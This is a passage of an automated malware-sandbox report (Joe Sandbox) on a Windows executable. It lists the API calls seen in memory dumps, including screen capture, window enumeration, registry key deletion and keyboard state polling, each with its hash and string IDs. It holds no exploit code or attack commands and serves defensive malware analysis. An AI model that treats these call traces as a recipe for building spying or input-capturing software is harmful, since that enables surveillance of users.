                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                      • String ID:
                                                                                                      • API String ID: 3840717409-0
                                                                                                      • Opcode ID: 9bf57370a6f1de027abecfd25f5c5223ead44b47c3ed69a3e0d426bb34abbf5e
                                                                                                      • Instruction ID: 5e52fdea484e5f60f01451affa83162db8c9002edeeab050021800ecc9c8312e
                                                                                                      • Opcode Fuzzy Hash: 9bf57370a6f1de027abecfd25f5c5223ead44b47c3ed69a3e0d426bb34abbf5e
                                                                                                      • Instruction Fuzzy Hash: 6F410675600309AFDB219F65CC88EAABBBAEF8A751F144058F906D72A0DB709901DB30
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • VariantInit.OLEAUT32(00000000), ref: 00D81DD6
                                                                                                      • VariantCopy.OLEAUT32(?,?), ref: 00D81DDF
                                                                                                      • VariantClear.OLEAUT32(?), ref: 00D81DEB
                                                                                                      • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 00D81ECF
                                                                                                      • VarR8FromDec.OLEAUT32(?,?), ref: 00D81F2B
                                                                                                      • VariantInit.OLEAUT32(?), ref: 00D81FDC
                                                                                                      • SysFreeString.OLEAUT32(?), ref: 00D82060
                                                                                                      • VariantClear.OLEAUT32(?), ref: 00D820AC
                                                                                                      • VariantClear.OLEAUT32(?), ref: 00D820BB
                                                                                                      • VariantInit.OLEAUT32(00000000), ref: 00D820F7
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
                                                                                                      • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                                                      • API String ID: 1234038744-3931177956
                                                                                                      • Opcode ID: d3b395e13fdf8fc9590828e0482ab8dd4ad23cd44552c4e292248ed5d1f50550
                                                                                                      • Instruction ID: a89520c8d7a43c8ad747d2abe312a4e140eec0b3c69c4591f2eb1e210c98f942
                                                                                                      • Opcode Fuzzy Hash: d3b395e13fdf8fc9590828e0482ab8dd4ad23cd44552c4e292248ed5d1f50550
                                                                                                      • Instruction Fuzzy Hash: D1D12571A00615EBCB21AF65D884BBAB7B8FF08711F148455F845AB281DB70EC99DBB0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • GetDC.USER32(00000000), ref: 00D92F35
                                                                                                      • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00D92F45
                                                                                                      • CreateCompatibleDC.GDI32(?), ref: 00D92F51
                                                                                                      • SelectObject.GDI32(00000000,?), ref: 00D92F5E
                                                                                                      • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 00D92FCA
                                                                                                      • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 00D93009
                                                                                                      • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 00D9302D
                                                                                                      • SelectObject.GDI32(?,?), ref: 00D93035
                                                                                                      • DeleteObject.GDI32(?), ref: 00D9303E
                                                                                                      • DeleteDC.GDI32(?), ref: 00D93045
                                                                                                      • ReleaseDC.USER32(00000000,?), ref: 00D93050
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                                      • String ID: (
                                                                                                      • API String ID: 2598888154-3887548279
                                                                                                      • Opcode ID: 1f34dec203964c5dc19cd8dba11fd3910fe0b2b1627b9b32a25d5f336dda5a9e
                                                                                                      • Instruction ID: 25bcf41113afa42da3dd6e8aa51e91fe042f540cf3e6e6e19492989e16e3d140
                                                                                                      • Opcode Fuzzy Hash: 1f34dec203964c5dc19cd8dba11fd3910fe0b2b1627b9b32a25d5f336dda5a9e
                                                                                                      • Instruction Fuzzy Hash: 8261C4B5D00219EFCF14CFA4D884AAEBBB6FF48310F248519E556A7250D771A941CF60
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • ___free_lconv_mon.LIBCMT ref: 00D4DE41
                                                                                                        • Part of subcall function 00D4D9DC: _free.LIBCMT ref: 00D4D9F9
                                                                                                        • Part of subcall function 00D4D9DC: _free.LIBCMT ref: 00D4DA0B
                                                                                                        • Part of subcall function 00D4D9DC: _free.LIBCMT ref: 00D4DA1D
                                                                                                        • Part of subcall function 00D4D9DC: _free.LIBCMT ref: 00D4DA2F
                                                                                                        • Part of subcall function 00D4D9DC: _free.LIBCMT ref: 00D4DA41
                                                                                                        • Part of subcall function 00D4D9DC: _free.LIBCMT ref: 00D4DA53
                                                                                                        • Part of subcall function 00D4D9DC: _free.LIBCMT ref: 00D4DA65
                                                                                                        • Part of subcall function 00D4D9DC: _free.LIBCMT ref: 00D4DA77
                                                                                                        • Part of subcall function 00D4D9DC: _free.LIBCMT ref: 00D4DA89
                                                                                                        • Part of subcall function 00D4D9DC: _free.LIBCMT ref: 00D4DA9B
                                                                                                        • Part of subcall function 00D4D9DC: _free.LIBCMT ref: 00D4DAAD
                                                                                                        • Part of subcall function 00D4D9DC: _free.LIBCMT ref: 00D4DABF
                                                                                                        • Part of subcall function 00D4D9DC: _free.LIBCMT ref: 00D4DAD1
                                                                                                      • _free.LIBCMT ref: 00D4DE36
                                                                                                        • Part of subcall function 00D42D58: RtlFreeHeap.NTDLL(00000000,00000000,?,00D4DB71,00DE1DC4,00000000,00DE1DC4,00000000,?,00D4DB98,00DE1DC4,00000007,00DE1DC4,?,00D4DF95,00DE1DC4), ref: 00D42D6E
                                                                                                        • Part of subcall function 00D42D58: GetLastError.KERNEL32(00DE1DC4,?,00D4DB71,00DE1DC4,00000000,00DE1DC4,00000000,?,00D4DB98,00DE1DC4,00000007,00DE1DC4,?,00D4DF95,00DE1DC4,00DE1DC4), ref: 00D42D80
                                                                                                      • _free.LIBCMT ref: 00D4DE58
                                                                                                      • _free.LIBCMT ref: 00D4DE6D
                                                                                                      • _free.LIBCMT ref: 00D4DE78
                                                                                                      • _free.LIBCMT ref: 00D4DE9A
                                                                                                      • _free.LIBCMT ref: 00D4DEAD
                                                                                                      • _free.LIBCMT ref: 00D4DEBB
                                                                                                      • _free.LIBCMT ref: 00D4DEC6
                                                                                                      • _free.LIBCMT ref: 00D4DEFE
                                                                                                      • _free.LIBCMT ref: 00D4DF05
                                                                                                      • _free.LIBCMT ref: 00D4DF22
                                                                                                      • _free.LIBCMT ref: 00D4DF3A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                      • String ID:
                                                                                                      • API String ID: 161543041-0
                                                                                                      • Opcode ID: 363ef24f46faca2db11b5e8f88b263fcf154dc4a2d862d01a16654f1ddc6b88a
                                                                                                      • Instruction ID: d0dd45d86ac9d02bd6b1d0910daa8ee7a4487d73e4e6b6db6b81e372c95b33ae
                                                                                                      • Opcode Fuzzy Hash: 363ef24f46faca2db11b5e8f88b263fcf154dc4a2d862d01a16654f1ddc6b88a
                                                                                                      • Instruction Fuzzy Hash: AA314D71A003459FDB31AA38D845B6673EAEF10310F58492AF499DB161DFB1ACC5CB70
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • DecodePointer.KERNEL32(10023A08,00000000,10006C19,10020340,00000008,CEF76CC5,100200AC,016FF568,00000001), ref: 1000B2E0
                                                                                                      • _free.LIBCMT ref: 1000B2F9
                                                                                                        • Part of subcall function 100054A4: HeapFree.KERNEL32(00000000,00000000,?,1000D9D6,00000000,00000001,00000000,?,0000001C,?,10004D4B,1000471D,10023A08), ref: 100054B8
                                                                                                        • Part of subcall function 100054A4: GetLastError.KERNEL32(00000000,?,1000D9D6,00000000,00000001,00000000,?,0000001C,?,10004D4B,1000471D,10023A08), ref: 100054CA
                                                                                                      • _free.LIBCMT ref: 1000B30C
                                                                                                      • _free.LIBCMT ref: 1000B32A
                                                                                                      • _free.LIBCMT ref: 1000B33C
                                                                                                      • _free.LIBCMT ref: 1000B34D
                                                                                                      • _free.LIBCMT ref: 1000B358
                                                                                                      • _free.LIBCMT ref: 1000B372
                                                                                                      • EncodePointer.KERNEL32(00000000,?,?,?,?,3266652F,00000000), ref: 1000B379
                                                                                                      • _free.LIBCMT ref: 1000B38E
                                                                                                      • _free.LIBCMT ref: 1000B3A4
                                                                                                      • InterlockedDecrement.KERNEL32 ref: 1000B3B6
                                                                                                      • _free.LIBCMT ref: 1000B3D0
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1931555351.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1931530312.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1931580966.000000001001B000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1931602166.0000000010022000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1931621641.0000000010026000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_10000000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _free$Pointer$DecodeDecrementEncodeErrorFreeHeapInterlockedLast
                                                                                                      • String ID:
                                                                                                      • API String ID: 4264854383-0
                                                                                                      • Opcode ID: 33f542483dbd40d0bc0cab94c8621c8fa47e7fd56b235821d97d3cf34165cd26
                                                                                                      • Instruction ID: 1fd6055cdc7d0ce3772d615670e9b0be796ff6f2fa317275c480f66e180b3f68
                                                                                                      • Opcode Fuzzy Hash: 33f542483dbd40d0bc0cab94c8621c8fa47e7fd56b235821d97d3cf34165cd26
                                                                                                      • Instruction Fuzzy Hash: 5D217A36901621DBFB41DF64ECC459A3BB4FB442F6333422AE904972A9CB71ADC2CB55
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • GetClassNameW.USER32(?,?,00000100), ref: 00D73F2B
                                                                                                      • _wcslen.LIBCMT ref: 00D73F36
                                                                                                      • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00D74026
                                                                                                      • GetClassNameW.USER32(?,?,00000400), ref: 00D7409B
                                                                                                      • GetDlgCtrlID.USER32(?), ref: 00D740EC
                                                                                                      • GetWindowRect.USER32(?,?), ref: 00D74111
                                                                                                      • GetParent.USER32(?), ref: 00D7412F
                                                                                                      • ScreenToClient.USER32(00000000), ref: 00D74136
                                                                                                      • GetClassNameW.USER32(?,?,00000100), ref: 00D741B0
                                                                                                      • GetWindowTextW.USER32(?,?,00000400), ref: 00D741EC
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
                                                                                                      • String ID: %s%u
                                                                                                      • API String ID: 4010501982-679674701
                                                                                                      • Opcode ID: 7a4592e95e5bd5439410092a67cfc6d8e4cc052b57b2c54cda5ae453c3ce1cfa
                                                                                                      • Instruction ID: a07a20c473a7d147966cd00c95a32de0099066e6089903acedcb4caa19a6eff1
                                                                                                      • Opcode Fuzzy Hash: 7a4592e95e5bd5439410092a67cfc6d8e4cc052b57b2c54cda5ae453c3ce1cfa
                                                                                                      • Instruction Fuzzy Hash: 4691AE71204706AFD71ADF24C884BEAB7A9FF44350F048529F99EC2191EB30EA55CBB1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • GetClassNameW.USER32(?,?,00000400), ref: 00D75223
                                                                                                      • GetWindowTextW.USER32(?,?,00000400), ref: 00D75269
                                                                                                      • _wcslen.LIBCMT ref: 00D7527A
                                                                                                      • CharUpperBuffW.USER32(?,00000000), ref: 00D75286
                                                                                                      • _wcsstr.LIBVCRUNTIME ref: 00D752BB
                                                                                                      • GetClassNameW.USER32(00000018,?,00000400), ref: 00D752F3
                                                                                                      • GetWindowTextW.USER32(?,?,00000400), ref: 00D7532C
                                                                                                      • GetClassNameW.USER32(00000018,?,00000400), ref: 00D75375
                                                                                                      • GetClassNameW.USER32(?,?,00000400), ref: 00D753AF
                                                                                                      • GetWindowRect.USER32(?,?), ref: 00D7541A
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                                                                                                      • String ID: ThumbnailClass
                                                                                                      • API String ID: 1311036022-1241985126
                                                                                                      • Opcode ID: 85810a89bd92971cb2c871ec86883f3d0195e12871e2e30a1dbf1eb852e7a482
                                                                                                      • Instruction ID: c1d0140811e72b67370d2c8387626beeb4098da46fa98543c139fdff05a83d98
                                                                                                      • Opcode Fuzzy Hash: 85810a89bd92971cb2c871ec86883f3d0195e12871e2e30a1dbf1eb852e7a482
                                                                                                      • Instruction Fuzzy Hash: A491E5711047059FDB04CF10E885BAA77A9FF44354F08846AFD8E9A19AEB70ED45CBB2
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • GetMenuItemInfoW.USER32(00DE2990,000000FF,00000000,00000030), ref: 00D7C888
                                                                                                      • SetMenuItemInfoW.USER32(00DE2990,00000004,00000000,00000030), ref: 00D7C8BD
                                                                                                      • Sleep.KERNEL32(000001F4), ref: 00D7C8CF
                                                                                                      • GetMenuItemCount.USER32(?), ref: 00D7C915
                                                                                                      • GetMenuItemID.USER32(?,00000000), ref: 00D7C932
                                                                                                      • GetMenuItemID.USER32(?,-00000001), ref: 00D7C95E
                                                                                                      • GetMenuItemID.USER32(?,?), ref: 00D7C9A5
                                                                                                      • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00D7C9EB
                                                                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00D7CA00
                                                                                                      • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00D7CA21
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ItemMenu$Info$CheckCountRadioSleep
                                                                                                      • String ID: 0
                                                                                                      • API String ID: 1460738036-4108050209
                                                                                                      • Opcode ID: 752850582bcbc290e0554298e36d5b2f387cc27539ef606a6e7c059bc61b63ac
                                                                                                      • Instruction ID: ee923f59cd67bdb8f6305685fa8e766e24b7e0674eb7b69893e4f7c5f362d8d5
                                                                                                      • Opcode Fuzzy Hash: 752850582bcbc290e0554298e36d5b2f387cc27539ef606a6e7c059bc61b63ac
                                                                                                      • Instruction Fuzzy Hash: AC617C7192024AAFDF11CF64D888AFEBBA9FB06305F049119E94AA3251E734ED05CB71
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00D9D5C3
                                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 00D9D5EC
                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00D9D6A7
                                                                                                        • Part of subcall function 00D9D593: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 00D9D609
                                                                                                        • Part of subcall function 00D9D593: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 00D9D61C
                                                                                                        • Part of subcall function 00D9D593: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00D9D62E
                                                                                                        • Part of subcall function 00D9D593: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00D9D664
                                                                                                        • Part of subcall function 00D9D593: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00D9D687
                                                                                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 00D9D652
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                                                                                      • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                      • API String ID: 2734957052-4033151799
                                                                                                      • Opcode ID: a57f15764c8289ad485ed6488daab19ae6074e879f48a44b52153da7b4ea89e1
                                                                                                      • Instruction ID: ce410518b84b5488d48a8910f8cfd8b1bf03c634df3a46f2ebb9ad3d7dd3cb7c
                                                                                                      • Opcode Fuzzy Hash: a57f15764c8289ad485ed6488daab19ae6074e879f48a44b52153da7b4ea89e1
                                                                                                      • Instruction Fuzzy Hash: 23316C7190122DBBDB219F91DC88EFFBB7EEF46710F040165F806E2244DA309A469AB0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • timeGetTime.WINMM ref: 00D7EEE0
                                                                                                        • Part of subcall function 00D2F27E: timeGetTime.WINMM(?,?,00D7EF00), ref: 00D2F282
                                                                                                      • Sleep.KERNEL32(0000000A), ref: 00D7EF0D
                                                                                                      • EnumThreadWindows.USER32(?,Function_0006EE91,00000000), ref: 00D7EF31
                                                                                                      • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00D7EF53
                                                                                                      • SetActiveWindow.USER32 ref: 00D7EF72
                                                                                                      • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00D7EF80
                                                                                                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 00D7EF9F
                                                                                                      • Sleep.KERNEL32(000000FA), ref: 00D7EFAA
                                                                                                      • IsWindow.USER32 ref: 00D7EFB6
                                                                                                      • EndDialog.USER32(00000000), ref: 00D7EFC7
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                                      • String ID: BUTTON
                                                                                                      • API String ID: 1194449130-3405671355
                                                                                                      • Opcode ID: 2379c39fbed1f56166d1747fff85d08fb8403a68f587fb00134ca9ca57b9d21f
                                                                                                      • Instruction ID: 9be96a5e645a035520e8ed194ab56d6cd77ba7f99fc80b04a9c55b10ceb077ec
                                                                                                      • Opcode Fuzzy Hash: 2379c39fbed1f56166d1747fff85d08fb8403a68f587fb00134ca9ca57b9d21f
                                                                                                      • Instruction Fuzzy Hash: 65214F70100345BFEB016F70ECC9A2A7B6AFB4A344B14845AF41AC6BB1EB718D009A74
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                        • Part of subcall function 00D1B25F: _wcslen.LIBCMT ref: 00D1B269
                                                                                                      • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00D7F289
                                                                                                      • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00D7F29F
                                                                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00D7F2B0
                                                                                                      • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00D7F2C2
                                                                                                      • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00D7F2D3
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: SendString$_wcslen
                                                                                                      • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                      • API String ID: 2420728520-1007645807
                                                                                                      • Opcode ID: c8a61f427a78712b98dbdce4de71e524aea82e25808cf7bd2fbfc370afb95f20
                                                                                                      • Instruction ID: 1119368f239b189d3d75fab0a147215c80d78f275bf667f692ddb029eabe96d8
                                                                                                      • Opcode Fuzzy Hash: c8a61f427a78712b98dbdce4de71e524aea82e25808cf7bd2fbfc370afb95f20
                                                                                                      • Instruction Fuzzy Hash: 5911E336A902693DD720A3A1EC0AEFF6A7CEFD2B10F00046B7401E21D1FEA04D49C9B0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • GetKeyboardState.USER32(?), ref: 00D7A8EE
                                                                                                      • SetKeyboardState.USER32(?), ref: 00D7A959
                                                                                                      • GetAsyncKeyState.USER32(000000A0), ref: 00D7A979
                                                                                                      • GetKeyState.USER32(000000A0), ref: 00D7A990
                                                                                                      • GetAsyncKeyState.USER32(000000A1), ref: 00D7A9BF
                                                                                                      • GetKeyState.USER32(000000A1), ref: 00D7A9D0
                                                                                                      • GetAsyncKeyState.USER32(00000011), ref: 00D7A9FC
                                                                                                      • GetKeyState.USER32(00000011), ref: 00D7AA0A
                                                                                                      • GetAsyncKeyState.USER32(00000012), ref: 00D7AA33
                                                                                                      • GetKeyState.USER32(00000012), ref: 00D7AA41
                                                                                                      • GetAsyncKeyState.USER32(0000005B), ref: 00D7AA6A
